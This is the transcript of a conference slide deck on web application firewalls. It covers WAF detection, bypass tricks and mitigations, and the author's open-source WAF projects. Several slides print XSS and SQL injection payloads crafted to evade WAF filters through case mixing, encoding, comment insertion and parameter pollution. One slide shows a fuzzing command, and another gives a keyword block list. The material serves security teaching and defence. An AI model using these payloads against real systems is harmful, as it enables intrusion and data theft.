Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Web Application firewall tricks and tips

CoolerVoid
September 27, 2021
0
240

Web Application firewall tricks and tips

Web Application firewall tricks and tips.

* How you can develop your WAF
* How too bypass any WAF

CoolerVoid

September 27, 2021
Tweet

More Decks by CoolerVoid

See All by CoolerVoid
anti_key_keeper_cooler.pptx__2___2_.pdf
coolervoid
0
68
Strange security mitigations
coolervoid
0
210
SAST for beginners.
coolervoid
0
170
Hacking in the electronic context for fun!
coolervoid
0
200
Tales from the security codereview
coolervoid
0
240
Understand malwares
coolervoid
0
36

Featured

See All Featured
Rebuilding a faster, lazier Slack
samanthasiow
79
8.6k
Imperfection Machines: The Place of Print at Facebook
scottboms
264
13k
The Cult of Friendly URLs
andyhume
78
6k
Automating Front-end Workflow
addyosmani
1365
200k
Into the Great Unknown - MozCon
thekraken
31
1.5k
The Straight Up "How To Draw Better" Workshop
denniskardys
232
140k
ReactJS: Keep Simple. Everything can be a component!
pedronauck
664
120k
Art, The Web, and Tiny UX
lynnandtonic
296
20k
Unsuck your backbone
ammeep
668
57k
A Modern Web Designer's Workflow
chriscoyier
692
190k
Optimizing for Happiness
mojombo
376
69k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
280
13k

Transcript

  1. Custom Web application firewall for modern world

  2. Whoamy • Antonio Costa aka Cooler_ • Projects: Github.com/CoolerVoid •

    Contact: [email protected] • Cyber security engineer • Programmer/developer • 13 years of work experience with pentest, codereview, development, incident detection, incident response and hardening.

  3. Simple case

  4. Request GET /sell/cars.php?search=<script>alert(document.cookie)</ script >

  5. Request rules • Full Match • Blocklist • Rank based

    • Regex • DFA • AI • ML

  6. Other resources for rules • Block per IP adress •

    Leak mitigation(responses) • Insert anti-csrf tokens • Detect UserAgent anomaly • Strong blocklist • Denial of service • Force hardening in custom endpoints Headers HSTS, anti-xss, CSP, nosniff… • Insert cookie attributes, httponly Secure...

  7. Practical point view • Detection the type of WAF •

    Common attacks in WAF • Custom attacks to bypass WAF • Attack Mitigation in WAF • Attack Mitigation in application • Create your custom WAF • My OpenSource Projects • Attack and Protection!

  8. Detection You can search a pattern in cookie, header response…

    Each WAF have a different context in response. • https://svn.nmap.org/nmap/scripts/http-waf-detect.nse • https://github.com/sandrogauci/wafw00f • http://code.google.com/p/imperva-detect/

  9. Common attacks • WAFs can be configured to actively block

    requests and traffic that violate the WAF rule-sets. This is a useful feature, but needs to be used judiciously, an WAF that is in over-active blocking mode prevents legitimate traffic from reaching the Web server, making the application unusable. • Sometimes have a weak rules, that don’t match attacks to block.

  10. Mixed case • Cool trick to bypass a common rule

    is mixed case, here the big purpose is bypass absence of case sensitive rules. • SELECT, SeLect, selEcT… UnIOn, unIoN... • Look this following: • /sell/cars.php?search=<script>alert(document.cookie)</script> • /sell/cars.php?search=<SCripT>AlErt(DoCuMenT.cOoKie)</scrIpt>

  11. Replace Keywords • Replace Keywords is common function in WAFs,

    this resource erase critical points in attacks, but you can bypass this, you need a point to insert attack word between payload. • Look this following: • /cars_show.php?car_id=-30 UNIunionON SELselectECT 6,7,8,9 • /cars_show.php?car_id=-30 UNION SELECT 6,7,8,9

  12. Spaces to comment • Replace points to comments is very

    good way to bypass WAF. • Look this following: • /sell/cars.php?search=id=1+UnIoN/*&a=*/SeLeCT/*&a=*/ 1,2,3,database()– - • /sell/cars.php?search=id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*! • table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()– -

  13. Encode abuse • Other trick to bypass, is the abuse

    of encode, sometimes application can render encoded strings... • Look this following: <script>alert(document.cookie)</script> • Url encode: %3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E • 64 encode: PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ=

  14. Buffer Overflow • When WAF service don’t have a proper

    validation in inputs, you can see this problem in fuzzing tests... • Look this following: • /cars/id/page/=-25+and+(select 2)=(Select0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA A...])+/*!UnIOn*/+/*!selECt*/+4,5,6,7… • id=2 and (select 2)=(Select 0xAAAAAAAAAAAAAAAAAAAAA...) +uNIoN+seLecT+2,3,version()...

  15. HTTP Parameter Pollution(HPP) The following request doesn’t allow anyone to

    conduct an attack: • /?id=1;select+4,5,6+from+users+where+id=1-- • This request will be successfully performed using HPP. • /?id=1;select+4&id=5,6+from+users+where+id=1-- • Successful conduction of an HPP attack bypassing WAF depends on the environment of the application being attacked

  16. Using HTTP Parameter Fragmentation (HPF) execute_query("select * from table where

    a=".input_a." and b=".input_b); execute_query("select * from table where a=".input_a." and b=".input_b." limit ".input_c); • The following request doesn’t allow anyone to conduct an attack • /?a=1+union+select+1,2/* These requests is a possible attack using HPF • /?a=1+union/*&b=*/select+1,2 /?a=1+union/*&b=*/select+1,pass/*&c=*/from+users-- • The SQL requests become • select * from table where a=1 union/* and b=*/select 1,2 select * from table where a=1 union/* and b=*/select 1,pass/*limit */from users--

  17. Time machine • Random delay each request • Random UserAgent

    per request • Random IP address per request(Proxy) • Bypass Intrusion prevention system (IPS) Web application firewall (WAF)

  18. Automate • Project to change your list of payloads using

    a lot techniques to help bypass a WAF. • https://github.com/CoolerVoid/payloadmask

  19. Fuzzing / Brute • 0d1n is a tool for automating

    customized attacks against web applications. • Open Source • Use thread pool • Github.com/CoolerVoid/0d1n

  20. Fuzzing / Brute

  21. Fuzzing / Brute • 0d1n –host http://localhost/test.php –post ”car_name_search=ˆ ”

    –payloads payloads/xss.txt –find_regex_list payloads/guess.txt –log name_log –save_response –tamper urlencode -proxy-rand payloads/proxy.txt

  22. Fuzzing / Brute

  23. Application mitigations • Validation and proper sanitization(remove DOM, js, HTML…).

    • Prepared Statements (with Parameterized Queries). • Create a function that check a Block list with common words in attacks (eval,timeout,union,--, select, delete, version, benchmark, sleep, /**/...), set all string to lower case before scan pattern. • Study your ORM(SQLalchemy, Hibernate...) to prevent pitfalls in resources. • Follow Mitre and OWASP tricks to hardening etc...

  24. Create your WAF

  25. Create your WAF • Study five years around sockets and

    raw sockets • Demultiplexer problems (select(), epoll(), kqueue(), pthreads(), MPI…) • Race conditions • Testing a lot list of libraries libuv(used by node) libevent(old lib for core of nginx) Python Twisted

  26. Create your WAF • WAF from the scratch RaptorWAF •

    Demultiplexer use select() with pthreads • Have a problem, race conditions in millions connections(lock with mutex cannot save). • Easy to understand • Github.com/CoolerVoid/RaptorWAF

  27. Create your WAF • Pthread tests • Libevent study •

    Lighthttpd core study • The big travel...

  28. Create your WAF • OctopusWAF • Uses LibEvent • Have

    support to heavy connections • Uses lib Injection to detect SQLi • Github.com/CoolerVoid/OctopusWAF

  29. Create your WAF

  30. Detections

  31. Detections • Machine learning • Natural language • IA •

    Score based • Uploads (binary checks)

  32. Questions ?

  33. Thank you Contact: [email protected]